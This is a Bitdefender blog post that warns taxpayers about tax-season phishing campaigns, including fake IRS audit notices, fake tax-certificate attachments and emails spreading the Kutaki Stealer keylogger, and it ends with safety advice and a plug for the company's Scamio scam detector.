Tax season always brings an increased risk of fraud for both tax professionals and individuals. Any taxpayer could be a target of cybercrooks who use a variety of tactics, including email and phone, to trick users into handing over credentials, PINs, and other sensitive information.
Did you know?
In 2023, the IRS received 294,138 complaints of tax-related identity theft from taxpayers. Victims had to wait an average of 19 months for the agency to process and send their refunds.
Some of the most convincing and successful scams during tax filing season rely on a couple of factors that leave people more vulnerable or susceptible to them.
This includes:
While we’ve already tackled some of the scam scenarios individuals can expect this year, researchers at Bitdefender Antispam Lab have remained vigilant for email-based schemes targeting taxpayers and tax professionals this week.
In many tax scams, fraudsters impersonate IRS agents and government employees. For about a week now, antispam researchers have noticed a wave of tax audit scams meant to steal login credentials and take over accounts.
In the sample below, fraudsters warn of an in-person audit at the place of business and ask the recipient to download documents to prepare for the “tax audit team” visit.
The link embedded in the email, directs users to a fake WeTransfer page where individuals need to fill out their credentials.
Although IRS audits are nothing new, and they don’t necessarily suggest a problem with the accounts of an individual or an organization, the message could panic an unaware individual into “downloading” the “Tax Demand Notice” and handing over login credentials to scammers.
It’s crucial to note that the IRS will initially notify individuals of an audit via mail only. A written request should contain a list of specific records that the IRS would like to review. Further instructions on how the agency will conduct the audit and contact information should also be enclosed in the letter. The IRS will never initiate an audit via telephone.
Legitimate and official audit requests should always arrive via an official letter in the mail.
Tax season can be a stressful time for all taxpayers who may unwittingly interact with fraudulent correspondence that seems to originate from the government revenue service.
In another scam campaign spotted by Bitdefender researchers, fraudsters bait recipients with fake attachments that purportedly contain a tax certificate.
A tax certificate is a very important document issued by a revenue service agency and serves as evidence of tax payments and compliance with local tax regulations. The HTML attachment, directs recipients to a fake Excel page that requires them to fill out their email address, password and phone numbers.
In another version of the scam, fraudsters impersonate a legitimate IRS registered tax preparer to steal credentials.
Nothing stings worse than having your personal or work device compromised by cybercriminals during tax season. Bitdefender researchers have also spotted a phishing campaign that aimed to infect recipients’ devices with Kutaki Stealer.
Kutaki is a key logger with info-stealing capabilities, including capturing user credentials, key strokes and mouse movements, and exfiltrating the data to the attackers.
The cybercriminals behind this campaign baited users with malicious attachments that allegedly contained details regarding a failed payment towards taxes. While the wording of the email might seem a bit off, the thought of facing additional payments or penalties could be enough to persuade even the most cautious of recipients to act.
Tax season gives fraudsters the perfect backdrop to conduct highly successful schemes against individuals, businesses, and even professional tax preparers.
Despite a slew of tactics and delivery methods for tax season scams, there are easy ways to stay safe from these fraud attempts.
Staying informed about the latest scam tactics and maintaining a skeptical mindset can be a very effective shield against any scam. If you know how to identify potential malicious activity, you can stay ahead of scammers who continuously adapt their ruses. It’s important to get rid of that “won’t happen to me” attitude and know that anyone, even the savviest individual, can be deceived by a scammer.
The bottom line:
When in doubt, ask Bitdefender Scamio, our AI-powered scam detector. Scamio helps you determine in minutes whether any unsolicited correspondence is a potential scam. Describe the situation to Scamio, send a link, text or screenshot. Scamio will analyze the information and respond. You can access Scamio for free on any device or operating system via your web browser or Facebook Messenger.
Note: This article is based on spam samples and analysis provided by our dedicated Bitdefender Labs researchers Viorel Zavoiu and Victor Vrabie
tags
Alina is a history buff passionate about cybersecurity and anything sci-fi, advocating Bitdefender technologies and solutions. She spends most of her time between her two feline friends and traveling.
View all postsDecember 19, 2024
November 14, 2024